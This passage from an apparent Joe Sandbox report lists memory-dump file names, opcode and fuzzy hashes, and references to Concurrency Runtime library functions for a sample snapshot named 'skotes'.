                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2033596534-0
                                                                                                                                                                                            • Opcode ID: 5e5f6c1e88616874b3ecfb1d07144d5f9c00e59e834c94cbb3cf713321518126
                                                                                                                                                                                            • Instruction ID: a0f5b4e4624c1018ab6a49276f670934f47963aafc13c2ef625f8d24c1e47afa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e5f6c1e88616874b3ecfb1d07144d5f9c00e59e834c94cbb3cf713321518126
                                                                                                                                                                                            • Instruction Fuzzy Hash: F921B231900D249FCB44EF64E482DEDB7B6AF45310F254469F401AF2A1DB316D41DF64
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0062A069
                                                                                                                                                                                            • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0062A07F
                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0062A0CB
                                                                                                                                                                                              • Part of subcall function 0062AB41: List.LIBCONCRT ref: 0062AB77
                                                                                                                                                                                            • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0062A0DB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$ExecutionHardwareProxy::Scheduler$AffinityAffinity::CoreCountCurrentFixedIncrementListResourceResource::
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4213627143-0
                                                                                                                                                                                            • Opcode ID: ecb9836484881fd9527bd948392a0e75a0d78dfc1579e326806fa59769ef183b
                                                                                                                                                                                            • Instruction ID: 5b2195df9650799943f6b448d092da3ec426956d7b667e267ae686dd2c88230d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ecb9836484881fd9527bd948392a0e75a0d78dfc1579e326806fa59769ef183b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6921AC31900A259FCB24EFA5E9908ABF3F6FF48710700495EE442A7651CB74A905CFA6
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 00624893
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 006248A5
                                                                                                                                                                                              • Part of subcall function 00625555: _InternalDeleteHelper.LIBCONCRT ref: 00625564
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 006248AF
                                                                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 006248C8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                                                                            • Opcode ID: c0aaafaa63d700fab0ec5390c2263ae29bbfc60fdd07df4d388828e550f0635f
                                                                                                                                                                                            • Instruction ID: 672f7ad0004c516d23710379ed9f4ccf5f8cd6c55292640e1cd14c58d575a56d
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0aaafaa63d700fab0ec5390c2263ae29bbfc60fdd07df4d388828e550f0635f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 51012631200D31AFCA65BB64E882EADB72BBF44710704012DF80597612CF20EC618BA4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062EE6A
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062EE7C
                                                                                                                                                                                              • Part of subcall function 0062EF29: _InternalDeleteHelper.LIBCONCRT ref: 0062EF3B
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062EE86
                                                                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 0062EE9F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3844194624-0
                                                                                                                                                                                            • Opcode ID: da8d665f3f1b643380ee3703b5c1fa3697bef93d4efc12f2b3a02968f3716e26
                                                                                                                                                                                            • Instruction ID: 9c3fa28d3e45af05f66cac2341396a57846079cb33913868e43f506a7ea7f256
                                                                                                                                                                                            • Opcode Fuzzy Hash: da8d665f3f1b643380ee3703b5c1fa3697bef93d4efc12f2b3a02968f3716e26
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7201D671300D31AFCB65BB60E9C2DAEBB6BBF44750705043DF84597612CB21EC519AD4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062D0C5
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062D0D7
                                                                                                                                                                                              • Part of subcall function 0062C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0062C6C4
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062D0E1
                                                                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 0062D0FA
